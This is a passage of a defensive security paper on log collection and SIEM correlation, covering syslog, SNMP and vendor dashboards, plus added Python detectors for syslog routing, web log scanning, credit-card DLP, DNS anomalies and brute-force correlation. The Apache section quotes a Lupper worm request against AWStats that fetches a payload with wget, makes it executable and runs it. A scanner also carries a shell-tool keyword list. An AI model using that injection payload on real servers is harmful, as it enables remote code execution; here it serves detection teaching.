Syslogd is a daemon that runs continuously on a system and is started at boot time. It is not controlled by inetd. Messages from applications are sent to a special file called /dev/log (a UNIX domain socket). Syslogd reads messages sent to /dev/log and, based on its configuration file (syslog.conf), routes them to the defined destination.


The syslog.conf file controls the behavior of syslogd. Syslog.conf is a simply formatted text file with the basic format being:

selector <Tab> action

or

facility.level <Tab> action

example:

mail.info /var/log/maillog

This would cause all informational messages from the mail system to be saved in the file /var/log/maillog. Syslogd produces timestamp messages, which are logged if the "mark" facility appears in syslog.conf to specify a destination for them. These timestamps give network administrators the ability to establish the exact time of an issue.
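The following Python example is added here and is not from the paper or from any syslog implementation. It encodes and decodes the PRI value that carries the facility and severity of Tables 1 and 2 on the wire (PRI = facility × 8 + severity, per RFC 5424), and applies the selector semantics of the syslog.conf format above, where "facility.level" matches messages from that facility at that level or more severe. The configuration file, the two messages and the host name loghost.example.org are constructed; the selector handling is deliberately simplified (no "=level" or "!level" extensions, and a ".none" exclusion always wins).

```python
import re
from typing import List, Optional, Tuple

# Facility and severity codes as numbered in RFC 5424, using the names of
# Tables 1 and 2 above (codes 12-15, ntp/audit/alert/cron2, are omitted).
FACILITIES = {
    "kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4, "syslog": 5,
    "lpr": 6, "news": 7, "uucp": 8, "cron": 9, "authpriv": 10, "ftp": 11,
    **{f"local{i}": 16 + i for i in range(8)},
}
SEVERITIES = {
    "emerg": 0, "alert": 1, "crit": 2, "err": 3,
    "warning": 4, "notice": 5, "info": 6, "debug": 7,
}
FACILITY_NAMES = {v: k for k, v in FACILITIES.items()}
SEVERITY_NAMES = {v: k for k, v in SEVERITIES.items()}

PRI_RE = re.compile(r"^<(\d{1,3})>(.*)$", re.S)


def encode_pri(facility: str, severity: str) -> int:
    """PRI = facility * 8 + severity, the number inside the <...> prefix on the wire."""
    return FACILITIES[facility] * 8 + SEVERITIES[severity]


def decode_pri(message: str) -> Optional[Tuple[str, str, str]]:
    """Split a raw '<PRI>...' message into (facility, severity, remainder)."""
    m = PRI_RE.match(message)
    if not m:
        return None
    facility, severity = divmod(int(m.group(1)), 8)
    if facility not in FACILITY_NAMES:
        return None
    return FACILITY_NAMES[facility], SEVERITY_NAMES[severity], m.group(2)


def selector_matches(selector: str, facility: str, severity: str) -> bool:
    """Simplified BSD syslog.conf selector: 'fac1,fac2.level' matches the listed
    facilities at that level or more severe; '*' is any facility or any level;
    '.none' excludes a facility; ';' joins several selectors."""
    matched = excluded = False
    for part in selector.split(";"):
        facs, _, level = part.strip().rpartition(".")
        fac_list = [f.strip() for f in facs.split(",")]
        if "*" not in fac_list and facility not in fac_list:
            continue
        if level == "none":
            excluded = True
        elif level == "*" or SEVERITIES[severity] <= SEVERITIES[level]:
            matched = True  # lower number = more severe
    return matched and not excluded


def route(config: str, message: str) -> List[str]:
    """Return the actions (files, @hosts, users) a syslog.conf applies to a message."""
    decoded = decode_pri(message)
    if decoded is None:
        return []
    facility, severity, _ = decoded
    actions = []
    for line in config.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"\s+", line, maxsplit=1)
        if len(parts) == 2 and selector_matches(parts[0], facility, severity):
            actions.append(parts[1])
    return actions


# Constructed syslog.conf: the mail.info example from the text plus a few
# typical lines, including forwarding notice-and-above to a central collector.
SAMPLE_CONF = """\
# selector<Tab>action
mail.info               /var/log/maillog
*.err                   /var/log/errors
auth,authpriv.*         /var/log/auth.log
*.*;auth,authpriv.none  /var/log/messages
*.notice                @loghost.example.org
"""

# Constructed messages: sshd under auth.info (<38>) and sendmail under mail.info (<22>).
SSHD_MSG = "<38>Jun 18 14:10:57 lighthouse sshd[9712]: Accepted publickey for jdoe from 10.10.10.5"
MAIL_MSG = "<22>Jun 18 14:11:03 lighthouse sendmail[9720]: o5IEB3Xq009720: from=<jdoe@example.org>"
```

With this configuration the sshd message lands only in /var/log/auth.log (the ".none" clause keeps it out of /var/log/messages), the sendmail message goes to both /var/log/maillog and /var/log/messages, and a Tripwire message at user.notice would encode as PRI 13 and also be forwarded to loghost.example.org.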

SYSLOG-NG

Syslog-ng is an open source implementation of syslog which extends the original syslogd model with content-based filtering, rich filtering, additional flexibility in configuration options, and additional features. One such feature is the ability to utilize TCP as the transport protocol to provide reliability. Syslog-ng was introduced in 1998 by Balazs Scheidler as a project to port the existing nsyslogd code to Linux.

Among the various extensions to syslogd are the following:

• ISO 8601 timestamp with millisecond granularity and time zone information
• Addition of the name of relays in the host fields to allow tracking of the path a message has traversed
• Reliable transport using TCP
• TLS encryption

Syslog-ng offers much wider functionality than transporting syslog messages. It also provides the following features:

• Ability to format log messages using variable expansion
• Use of variable expansion when naming files
• Ability to send log messages to local applications
• Message flow control in network transport
• Logging directly to a database
• Rewrite portions of the syslog message with set and substitute primitives
• Classify incoming log messages and at the same time extract structured information from the unstructured syslog message
• Generic name-value support
• Ability to process structured message formats over syslog

RSYSLOG

Rsyslog is an enhanced version of syslogd. It is licensed under the GPL (General Public License). Introduced in 2004 by Rainer Gerhards, the goal of the rsyslog project is to provide a more feature-rich, reliable syslog daemon. Reliability is accomplished through the use of TCP as the transport protocol. Initially, rsyslog did not support reliable syslog or TCP. Instead, rsyslog supported database integration and enhanced configuration. One of the design goals of rsyslog is to act as a direct replacement for the syslogd daemon.

ALTERNATIVES TO SYSLOG

Although syslog is essentially ubiquitous among network devices, it is not natively supported by Microsoft Windows; however, there are numerous third-party applications that allow the use of syslog. As an alternative to syslog, two options worthy of note are SNMP and Microsoft Operations Manager. Of these two, only SNMP will be discussed, as this is an alternative that can be utilized without adding infrastructure to the sample environment.

SNMP

SNMP, or Simple Network Management Protocol, is an Internet standard protocol designed to facilitate the management of devices on IP networks. SNMP is supported by virtually all network devices, including routers, switches, printers, workstations, servers, modems, uninterruptible power supply (UPS) systems, VoIP phones, HVAC systems, many cellular smart phones, and more. SNMP can be used simply to monitor the health of a network device, or it can be used to manage and control network devices. SNMP can gather information ranging from basic device status or traffic statistics to device-specific information such as air temperature and humidity inside a switch. SNMP is supported natively by MS Windows.

SNMP is utilized through a relatively simple set of operations. These operations allow devices to be queried for specific information or for specific parameters to be modified on a device. Through SNMP, for example, one can determine the operating characteristics of a switch interface by querying the switch. One could also use SNMP to shut down or activate a switch port. The commands that SNMP uses are as follows:

• get
• getnext
• getbulk (SNMPv2 and SNMPv3)
• set
• getresponse
• trap
• notification (SNMPv2 and SNMPv3)
• inform (SNMPv2 and SNMPv3)
• report (SNMPv2 and SNMPv3)

There are three versions of SNMP. SNMPv1 is the original version of the SNMP protocol. It is defined in RFC 1157. SNMPv2 extended the type of information that could be gathered by SNMP and is defined in RFC 3416, RFC 3417, and RFC 3418. SNMPv3 is the most recent version of SNMP. SNMPv3 is the first implementation of SNMP that introduces strong security. Whereas SNMPv1 and SNMPv2 pass all information in clear text, SNMPv3 can be configured to encrypt all SNMP packets. SNMPv3 is defined in RFC 3410, RFC 3411, RFC 3412, RFC 3413, RFC 3414, RFC 3415, RFC 3416, RFC 3417, RFC 3418, and RFC 2576.

SNMP has two components – a manager and an agent. Agents are configured on the devices to be monitored. The manager is the system, typically a Network Management System (NMS), that generates requests for information and receives information being sent from the various devices. SNMP can also be used to send traps. Traps are, essentially, alerts sent from a device to a manager indicating that something has gone wrong. The trap message will include specific information about the fault, allowing the network administrator to more easily resolve the issue. Traps can be equated to syslog messages. There are seven generic traps; however, each device has the capability to send more specific traps, as defined by the developer or manufacturer.

Table 3 - SNMP Generic Traps

Generic trap name (and number)   Meaning
coldStart (0)                    Indicates that the agent has rebooted
warmStart (1)                    Indicates that the agent has reinitialized itself
linkDown (2)                     Indicates that an interface on a device has gone down
linkUp (3)                       Indicates that an interface on a device has gone up
authenticationFailure (4)        Indicates an attempt to query a device with an incorrect authentication credential
egpNeighborLoss (5)              Indicates that an EGP neighbor has gone down
enterpriseSpecific (6)           Indicates that a trap is enterprise-specific. In other words, it is a trap specific to the device as defined by the developer or manufacturer


5. Using/Correlating Data

Logging Attacks

In order to see the value of correlating events it is important to look at an attack from a broader view to understand the goals of an attack. A single event may be only one small piece of an attacker's overall strategy. Below are some examples of single events that can be seen across different logging and alarming systems.

Apache Log - worm

The following is an example Apache log entry of an attack by the Lupper worm against the AWStats command-injection vulnerability:

[24/Dec/2005:13:02:18 +1300] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1

Certain versions of the awstats program would execute the code "echo%20YYY;cd%20%2ftmp%3bwget%20192%2e168%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;" in response to this request. This would cause the file at '192.168.1.216/nikons' to be downloaded and stored in the /tmp directory. Then it would be made executable using 'chmod +x nikons' and finally it would be executed.
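The following Python example (added here, not from the paper) shows how a log-review script would surface this entry among ordinary AWStats traffic: it percent-decodes each query-string parameter, so that the %2f and %3b escapes become the slashes and semicolons an analyst reads, and reports values that are wrapped in pipes or contain shell commands. The Common Log Format lines, including the client address 198.51.100.9 and the status and size fields added around the quoted request, are constructed.

```python
import re
from typing import List
from urllib.parse import unquote

# Constructed Common Log Format lines: the first carries the AWStats request
# quoted above (client IP, status and size are made up), the others are
# ordinary traffic that must not be flagged.
SAMPLE_LINES = [
    '198.51.100.9 - - [24/Dec/2005:13:02:18 +1300] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20xx%2eyyy%2ez%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo| HTTP/1.1" 200 3117',
    '10.10.10.51 - - [24/Dec/2005:13:05:01 +1300] "GET /cgi-bin/awstats.pl?config=www.example.org&output=main HTTP/1.1" 200 51200',
    '10.10.10.52 - - [24/Dec/2005:13:06:44 +1300] "GET /index.html HTTP/1.1" 200 2048',
]

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Substrings that rarely belong in a legitimate query-string value.
SHELL_TOKENS = ("wget ", "curl ", "chmod ", "cd /tmp", "/bin/sh", "nc ", "perl ")


def inspect_query(client: str, ts: str, path: str, query: str) -> List[dict]:
    """Percent-decode each parameter and report those that look like injected commands."""
    findings = []
    for part in query.split("&"):
        name, _, raw = part.partition("=")
        value = unquote(raw)  # %2f -> '/', %3b -> ';', %20 -> ' '
        indicators = []
        if value.startswith("|") or value.endswith("|"):
            # the form the AWStats configdir injection took: the parameter value
            # is wrapped in pipes so that it is run as a command
            indicators.append("pipe-wrapped value")
        if ";" in value:
            indicators.append("command separator")
        indicators += [f"shell command: {tok.strip()}" for tok in SHELL_TOKENS if tok in value]
        if indicators:
            findings.append({"client": client, "timestamp": ts, "path": path,
                             "param": name, "decoded": value, "indicators": indicators})
    return findings


def scan(lines: List[str]) -> List[dict]:
    """Run inspect_query over every request line that carries a query string."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or "?" not in m["target"]:
            continue
        path, query = m["target"].split("?", 1)
        findings += inspect_query(m["client"], m["ts"], path, query)
    return findings
```

On the sample, only the first line is reported: its configdir value decodes to a pipe-wrapped command chain containing cd /tmp, wget and chmod, while the legitimate config= and output= parameters on the second line produce no indicators.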

DLP

Below is an example of a Snort rule that looks for credit card numbers being transferred in clear text.

#alert ip any any -> any any (msg:"ET POLICY Credit Card Number Detected in Clear (15 digit dashed)"; pcre:"/(3[4|7]\d{2}|2014|2149|2131|1800)-\d{4}-\d{4}-\d{3} /"; reference:url,www.beachnet.com/~hstiles/cardtype.html; classtype:policy-violation; reference:url,doc.emergingthreats.net/2001380; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Credit_Card_Numbers; sid:2001380; rev:12;)
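As an added example, not part of the paper or of the Emerging Threats rule set, the Python below applies the same pattern to outbound mail log lines and adds two things a DLP analyst usually wants: a Luhn (mod 10) check to discard digit strings that merely fit the format, and masking so the alert itself does not carry the full card number into the SIEM. One caveat on the rule as quoted: in PCRE the class [4|7] matches the three characters 4, | and 7, so the intended American Express prefixes 34 and 37 are better written as 3[47]. The log lines are constructed; 3782-8224-6310-005 is a published test number.

```python
import re
from typing import List, Tuple

# The Snort pcre above for Python's re module, with the class written as [47];
# the trailing space is required just as in the rule.
CARD_RE = re.compile(r"(?:3[47]\d{2}|2014|2149|2131|1800)-\d{4}-\d{4}-\d{3} ")


def luhn_ok(digits: str) -> bool:
    """Luhn (mod 10) check over a string of digits."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:  # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(number: str) -> str:
    """Replace every digit except the last four, so the alert does not leak the PAN."""
    return re.sub(r"\d", "X", number[:-4]) + number[-4:]


def find_cards(text: str, require_luhn: bool = True) -> List[str]:
    """Masked card numbers in text that match the rule's pattern and, optionally, Luhn."""
    hits = []
    for m in CARD_RE.finditer(text):
        number = m.group(0).strip()
        if require_luhn and not luhn_ok(number.replace("-", "")):
            continue
        hits.append(mask(number))
    return hits


def scan(lines: List[str], require_luhn: bool = True) -> List[Tuple[int, str]]:
    """(line index, masked number) for every hit in a batch of log lines."""
    return [(i, hit) for i, line in enumerate(lines) for hit in find_cards(line, require_luhn)]


# Constructed outbound-mail log lines: a published test PAN that passes Luhn,
# a string that fits the pattern but fails Luhn, and a line with no card at all.
SAMPLE_LINES = [
    "2010-05-03 14:02:52 smtp-out 10.10.10.20 -> 203.0.113.7 body: please charge card 3782-8224-6310-005 exp 03/12",
    "2010-05-03 14:03:10 smtp-out 10.10.10.21 -> 203.0.113.8 body: order ref 3782-8224-6310-006 thanks",
    "2010-05-03 14:04:00 smtp-out 10.10.10.22 -> 203.0.113.9 body: meeting at 10:30 tomorrow",
]
```

With the Luhn check on, only the first line is reported, as XXXX-XXXX-XXXX-005; with it off, the second line's near-miss is reported too, which is the kind of false positive the rule alone produces.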

Unusual Traffic Patterns

The following Netflow traffic patterns have outbound UDP port 53 traffic that does not match common traffic patterns for the local network. This could be a compromised system sending information out of the company network, or it could be normal traffic.


router#sh ip cache flow
-------------------------------------------------------------------------------
IP packet size distribution (435092M total packets):
   1-32   64   96  128  160  192  224  256  288  320  352  384  416  448  480
   .000 .296 .026 .017 .003 .019 .006 .001 .002 .003 .001 .002 .001 .001 .002
...
Protocol         Total    Flows   Packets Bytes  Packets Active Idle
--------         Flows     /Sec     /Flow  /Pkt     /Sec  /Flow /Flow
...
TCP-other   10428853693   2428.1       10   677  26088.3    0.4   1.3
UDP-DNS      5508635330   1282.5        1   804   1799.1    0.0   3.7
UDP-NTP         7312730      1.7        1    77      1.7    0.0   5.4
...
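The Python below is an added example, not from the paper or from Cisco, that parses the per-protocol rows of this output and applies two checks to the UDP-DNS row: an average packet size above the classic 512-byte UDP DNS message limit of RFC 1035 (EDNS permits larger messages, so the threshold should be tuned to the site), and a sustained DNS throughput ceiling. The three rows are the ones shown above; the ceiling of 200,000 bytes per second is an assumed baseline.

```python
from typing import Dict, List, Tuple

# Constructed excerpt in the layout of the protocol summary above.
SAMPLE_OUTPUT = """\
Protocol         Total    Flows   Packets Bytes  Packets Active Idle
--------         Flows     /Sec     /Flow  /Pkt     /Sec  /Flow /Flow
TCP-other   10428853693   2428.1       10   677  26088.3    0.4   1.3
UDP-DNS      5508635330   1282.5        1   804   1799.1    0.0   3.7
UDP-NTP         7312730      1.7        1    77      1.7    0.0   5.4
"""


def parse_protocol_table(text: str) -> Dict[str, dict]:
    """Turn the per-protocol rows into a dict keyed by protocol name."""
    rows = {}
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) != 8 or not tokens[1].isdigit():
            continue  # header, ruler or truncated lines
        proto, v = tokens[0], tokens[1:]
        rows[proto] = {
            "total_flows": int(v[0]),
            "flows_per_sec": float(v[1]),
            "pkts_per_flow": int(v[2]),
            "bytes_per_pkt": int(v[3]),
            "pkts_per_sec": float(v[4]),
            "active_per_flow": float(v[5]),
            "idle_per_flow": float(v[6]),
        }
    return rows


def flow_share(rows: Dict[str, dict], proto: str) -> float:
    """Fraction of all flows in the table that belong to one protocol."""
    total = sum(r["total_flows"] for r in rows.values())
    return rows[proto]["total_flows"] / total if total else 0.0


def dns_anomalies(rows: Dict[str, dict], max_bytes_per_pkt: int = 512,
                  max_bytes_per_sec: float = 200_000.0) -> List[Tuple[str, str]]:
    """Flag a UDP-DNS row whose shape does not look like ordinary name resolution.

    512 bytes is the classic UDP DNS limit (RFC 1035); EDNS allows more, so tune
    it. The throughput ceiling is an assumed per-site baseline, not a standard.
    """
    findings = []
    dns = rows.get("UDP-DNS")
    if dns is None:
        return findings
    if dns["bytes_per_pkt"] > max_bytes_per_pkt:
        findings.append(("UDP-DNS", f"average packet {dns['bytes_per_pkt']} bytes exceeds {max_bytes_per_pkt}"))
    throughput = dns["pkts_per_sec"] * dns["bytes_per_pkt"]
    if throughput > max_bytes_per_sec:
        findings.append(("UDP-DNS", f"sustained {throughput:.0f} bytes/s of DNS exceeds {max_bytes_per_sec:.0f}"))
    return findings
```

On the sample both checks fire: 804 bytes per DNS packet is well above 512, and 1799 packets per second at that size is roughly 1.4 MB/s of "DNS", which alongside DNS making up about a third of all flows is the pattern the text calls out for investigation rather than proof of compromise on its own.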

Correlating

The above events, looked at individually, may not raise a high priority alarm. Each event could be treated individually with specific mitigation techniques or even possibly ignored. Looking at each event individually makes it difficult to assess if a strategic attack is occurring and what an attacker's goal may be. These combined events should be treated differently than each event by itself. Correlating the events gives a company a better picture of the overall attack strategy used by an attacker. This knowledge can allow a company to adopt an overall defense strategy very quickly. Hopefully the many products offered by SIEM vendors can effectively leverage event correlation and help a company better protect itself.

Before We Begin

This paper assumes you, the user, have already done your due diligence regarding the selection of a SIEM. The SIEM technology meets your business needs, and you already have use cases you need to address with the technology. There is one item to verify before we go any further with the discussion of using and correlating data. A company needs to have a corporate policy defining appropriate and inappropriate computer use. A behavior in one environment may violate company policy or federal regulations, but in another, the policy may be less stringent and allow questionable actions. The typical college campus comes to mind. A sound corporate policy will drive many practical uses of a SIEM. This section assumes you already have a company security policy that your SIEM will support. SIEM correlation rules apply logic to data and make decisions based on that logic. Without applying context, content, and other external factors, the logic does not always derive the correct answer. This is why the analyst plays an important role.

What is a SIEM?

A SIEM is a huge repository of data stored in a normalized format and available for searching and reporting. Normalization of data is the process of converting log data from its native form into a common format. This common format gives users the ability to search for common events across disparate systems. Being able to make sense and business use of the data is the magic of a SIEM analyst. This section of the paper will discuss how to leverage log data to address the following use cases:

• Identify common attacks and what log entries they produce
• Prevention of in-bound attacks (both external/internal)
• Prevention of outbound data loss (DLP)
• Identifying infected systems
• Mitigating against infected systems
• Use and misuse of privileged accounts
• Access to sensitive information (database information such as payroll)

Access to Enterprise-wide Data and Events

One of the strengths of the SIEM is the ability to quickly view, navigate, find and report on events in an environment. Collection of data into a common system with the ability to view and prioritize events can solve many security challenges facing organizations today. Below is an example of a view from a SIEM. There is a wealth of information waiting for the analyst to use.


Overview screen from QRadar

Vendor Setups

When preparing for this section the team collaborated with four vendors to address the use cases and provide the team with additional counsel on how to best leverage a SIEM in the fictional environment. The team prepared a survey to gather information from the vendors concerning their products. As part of the survey, the vendors made recommendations of how much product would address the company's business need and how their product would fit into a fictional company network. The team allowed the vendors to configure their products in the fictional company to produce optimal results while using a reasonable budget. The vendors collaborating with the team are:

• Log Rhythm (http://logrhythm.com/)
• QRadar (http://www.q1labs.com/)
• Prismmicrosystems (http://www.prismmicrosys.com/)
• Nitro Security (http://nitrosecurity.com/)


Proceed with Caution

A strength and curse of a SIEM is the deep insight into an environment that before SIEM implementation was not possible. The SIEM allows the collection and viewing of data that most environments rarely had access to before the arrival of a SIEM. Unless your environment is unique, the first thing you will notice about your environment is the amount of operational crud that needs attention and correction. Most companies uncover a plethora of broken processes and policy violations. This operational noise provides the perfect cover for nefarious activities to fly under the radar. Although the cleanup of these policy violations and broken processes can be arduous, it is well worth it. Operational issues can quickly become outages and resource drains.

The next warning concerns sales staff who may tell you a SIEM runs itself. Although our team did not hear this from any of the vendors participating in our study, there are many horror stories from people who were told, "Turn it on, point log sources at it and it will run itself." A SIEM or any tool is only as good as the person using it. The analyst applies business knowledge and context to events in the environment.

Finally, a SIEM can quickly overwhelm an analyst once the data starts flowing. The temptation to send everything to a SIEM is common; however, after a short period most users realize they need to prioritize the data. One of the collateral effects of sending large amounts of log data to a SIEM is having to weed through volumes of meaningless information. With tuning, business knowledge, corporate policies, and product knowledge, the analyst starts to distinguish useful data from noise.

Identify common attacks and what log entries they produce

Brute force login attempts are an old school way of breaking into a computer system. There are numerous studies concerning the dangers of weak passwords chosen by users. Many users prefer convenience over security, a practice that places organizations at risk. The report below shows the server at IP address 10.10.10.10 having 343,906 failed logins from the user baduser. This report is for the period spanning April 30 to May 5. Further investigation would reveal either a broken process trying to connect to the server, or a malicious user trying to connect to the server by brute force password guessing. Regardless of the root cause, this event requires further investigation and resolution. This report may also reveal a policy violation of an account that does not have a lockout threshold after so many failed attempts.


Nitro Security login failed report
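The following Python example, added here and not taken from the paper or from any vendor product, implements two correlation rules of the kind the Correlating section above argues for: a threshold rule that fires on repeated failed logins for one host and user (the pattern behind the baduser report), and a cross-source rule that escalates a host when an exploit attempt in the web logs is followed within a window by events from other log sources, so that events which are low priority on their own are treated differently together. All events, hosts, users, thresholds and windows are constructed for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import List


def event(ts: str, source: str, host: str, kind: str, **fields) -> dict:
    """Build one normalized event: timestamp, producing log source, affected host, type."""
    e = {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"),
         "source": source, "host": host, "kind": kind}
    e.update(fields)
    return e


# Constructed normalized events from several log sources (all values made up):
# a burst of failed logins, one stray failure, a web exploit attempt followed by
# a DNS anomaly and a DLP hit on the same host, and a lone DNS anomaly elsewhere.
EVENTS = [
    event("2010-05-03 14:00:01", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:02", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:04", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:05", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:07", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:09", "sshd", "10.10.10.10", "failed_login", user="baduser", src="203.0.113.5"),
    event("2010-05-03 14:00:20", "sshd", "10.10.10.10", "failed_login", user="alice", src="10.10.10.77"),
    event("2010-05-03 14:05:00", "apache", "10.10.10.30", "web_exploit_attempt", src="198.51.100.9"),
    event("2010-05-03 14:06:10", "netflow", "10.10.10.30", "dns_anomaly"),
    event("2010-05-03 14:07:30", "snort", "10.10.10.30", "dlp_hit"),
    event("2010-05-03 15:30:00", "netflow", "10.10.10.40", "dns_anomaly"),
]


def brute_force_alerts(events: List[dict], threshold: int = 5,
                       window: timedelta = timedelta(minutes=1)) -> List[dict]:
    """Threshold rule: at least `threshold` failed logins for one host/user inside `window`.

    Both values are assumed; one alert per host/user, with the count updated as
    further failures arrive inside the window.
    """
    alerts = {}
    recent = defaultdict(deque)
    for e in sorted(events, key=lambda x: x["ts"]):
        if e["kind"] != "failed_login":
            continue
        key = (e["host"], e["user"])
        q = recent[key]
        q.append(e["ts"])
        while q and e["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold:
            if key not in alerts:
                alerts[key] = {"rule": "brute_force", "host": e["host"], "user": e["user"],
                               "src": e["src"], "count": len(q), "severity": "medium"}
            else:
                alerts[key]["count"] = max(alerts[key]["count"], len(q))
    return list(alerts.values())


def multi_source_alerts(events: List[dict],
                        window: timedelta = timedelta(minutes=10)) -> List[dict]:
    """Cross-source rule: a web exploit attempt against a host that is followed within
    `window` by events from other log sources is escalated; the more independent
    sources agree, the higher the severity."""
    alerts = []
    by_host = defaultdict(list)
    for e in events:
        by_host[e["host"]].append(e)
    for host, evs in by_host.items():
        evs.sort(key=lambda x: x["ts"])
        for trigger in (x for x in evs if x["kind"] == "web_exploit_attempt"):
            follow = [x for x in evs if trigger["ts"] <= x["ts"] <= trigger["ts"] + window]
            sources = {x["source"] for x in follow}
            if len(sources) >= 2:
                alerts.append({"rule": "suspected_compromise", "host": host,
                               "evidence": sorted({x["kind"] for x in follow}),
                               "sources": sorted(sources),
                               "severity": "high" if len(sources) >= 3 else "medium"})
    return alerts


def correlate(events: List[dict]) -> List[dict]:
    """Run every rule over the normalized event stream and return all alerts."""
    return brute_force_alerts(events) + multi_source_alerts(events)
```

On the sample stream the rules produce exactly two alerts: a medium brute-force alert for baduser on 10.10.10.10 with six failures, and a high suspected-compromise alert for 10.10.10.30 backed by three sources (apache, netflow, snort). The single DNS anomaly on 10.10.10.40 and alice's one failure produce nothing, which is the point: the same netflow event is noise on one host and evidence on another.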

· Identify common attacks and what log entries they produce

The view below shows a correlated incidents dashboard summarizing potential attacks (by the correlated events they generate), bound to the source and destination IPs associated with the events, and then allowing the user to see the individual log events in the Events window at the bottom. Nitroview employs a technique called "data binding" which allows live linking of queries between component windows to allow on-demand forensic investigation.


Nitro Security Common Attacks

Identify common attacks

• password guess/login failure, alerting via e-mail


• Inbound attack (captured via snort integration)

• Firewall blocks (summary showing time, destination and source)

• Software install (Office 2007 by user=jcarlson)


• Abnormal IP address access to network by 206.33.41.126

Prism Microsystems common attacks

Prevention of in-bound attacks (both external/internal)

· Prevention of in-bound attacks (both external/internal)

The view below offers a summary of events headed "into" the JWP private IP space (10.0.0.0/8). Through the use of baselining, the customer can compare current event activity by destination IP to the historical normative behavior. This allows a contextual understanding of how events are changing in time, helping pinpoint anomalous activity into the JWP network.


Nitro Security in-bound attack detection using baselining

It is hard to read anything security-related in the mainstream news without hearing about the deluge of botnets on the Internet. These pesky adversaries can suck the life and data out of any network. Early detection of botnets can help improve the security posture of any company. Below is an example of botnet detection using QRadar.


QRadar detecting a botnet with the help of QFlow

Log Rhythm detecting anomalous network behavior


Prevention of outbound data loss (DLP)

Richard Bejtlich in his book Extrusion Detection Security Monitoring for Internal Systems defines extrusion detection as "the process of identifying unauthorized activity by inspecting outbound network traffic."

The value of any company is its Intellectual Property. Intellectual Property can take many forms depending on the business or environment. Regardless of the environment, loss of intellectual property can be damaging to a company. In this age of global business and competition, protecting Intellectual Property is not only mission critical, it is also very difficult. Determined miscreants have become increasingly brazen in their efforts to gain competitive advantages. Sending the right data to a SIEM, coupled with reporting, can help protect an environment against outbound data loss.

For example, every company knows or should know who their competition is. Using e-mail logs a company can see if any employee is communicating with competitors. If they are, the company can start an investigation to see if any intellectual property such as sales contacts, bids, or financial data, among others, is being sent to the competition. Using Netflow (session data) in combination with e-mail logs could help an environment find secrets being leaked to a competitor.

Another example is the use of Netflow data to watch printer activity. If you notice an employee increasing their printing activity, printing larger volumes than normal, this may be a sign that the employee is printing sensitive or confidential material for use outside of the organization.

Prevention of outbound data loss (DLP)

The view below depicts the Nitroview capability of taking feeds from the Application Data Monitoring Appliance. Again, we are using the filtering option, this time for destination traffic that does not terminate in the JWP internal network. Shown is an example of gnutella traffic sourced from the JWP network heading to the Internet.


Nitro Security detecting outbound Gnutella traffic


QRadar reporting on DLP

• USB insertion detected; user=cmills, system=SAPPHIRE
• Risk is evaluated as Low because asset value is low and vulnerability status is low


Prism Microsystems detecting DLP via USB drives

Identifying Infected systems

· Identifying Infected systems

This view allows the comparison of network flow data collected from the network infrastructure to event data to help pinpoint potentially infected machines in the JWP network.

Nitro Security detecting infected systems

Normal worm behavior


Worm behavior found in the QRadar system.

Identifying infected systems

• System SAPPHIRE has been infected by 0.exe and hacker.exe


• Infection traced to USB inserted by User=PRISMUSA\warren

Prism Microsystem detecting computer infections


Log Rhythm detecting suspicious behavior and possible infection

Mitigating against infected systems

Mitigation options for Nitroview customers include the ability to add attackers to IPS-based blacklists, and integration with other security appliances. Any event, including those that indicate possible infections, can be used as a trigger to generate an SNMP trap or syslog notification to these other systems (NAC, AV, firewall, etc.).


Nitro Security's integration with IPS systems

Use and misuse of privileged accounts

· Use and misuse of privileged accounts

The privileged user audit trail shows event activity by users defined as members of privileged groups (Administrator, root, sa, etc.).


Nitro security privileged account use

The use and misuse of privileged accounts is a big concern for many organizations. There seems to be a constant battle between administration staff, who are tasked with administration of a host, and the user community, who complain that the only way they can do their job is with a privileged account. With the privilege comes responsibility and temptation. We see in the report below that the user BadUser cleared the Windows Event Log on the server at IP address 10.10.10.10. Keeping a local copy of the Event Log is important for the Windows administration staff; this gives them the ability to troubleshoot problems. If the Windows log were not centrally stored, an action like this could cripple a security or operational investigation. Knowing when and by whom event logs were cleared is very important to the security posture of any organization.


User clearing a Windows Event Log


Log Rhythm privileged use report


QRadar use and misuse of privileged accounts

• PMILAB\warren is an administrator

Prism Microsystems privileges use reporting


Access to sensitive information (database information such as payroll)

· Access to sensitive information (database information such as payroll)

This application view illustrates activity by users who are accessing the payments application.

Nitro Security sensitive data access

